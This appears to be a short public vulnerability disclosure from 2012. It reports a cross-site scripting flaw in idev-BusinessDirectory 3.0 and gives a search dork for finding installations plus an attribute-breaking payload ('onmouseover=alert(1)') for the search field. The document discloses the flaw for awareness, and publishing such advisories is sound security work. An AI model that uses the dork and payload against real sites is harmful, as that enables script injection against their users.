# # Title : idev-BusinessDirectory 3.0 Vulnerability # Author : Red Security TEAM # Date : 25/02/2012 # Demo : http://www.idevspot.com/demos/idev-businessdirectory/ # Dork : "(Business Directory Software :: idev-BusinessDirectory 3.0)" # Tested On : CentOS # Contact : Info [ at ] RedSecurity [ . ] COM # Home : http://RedSecurity.COM # # Exploit : # # I : http://server/index.php # II : Put XSS code in Search field Like this : " onmouseover=alert(1) bad=" and then Go on the Search field #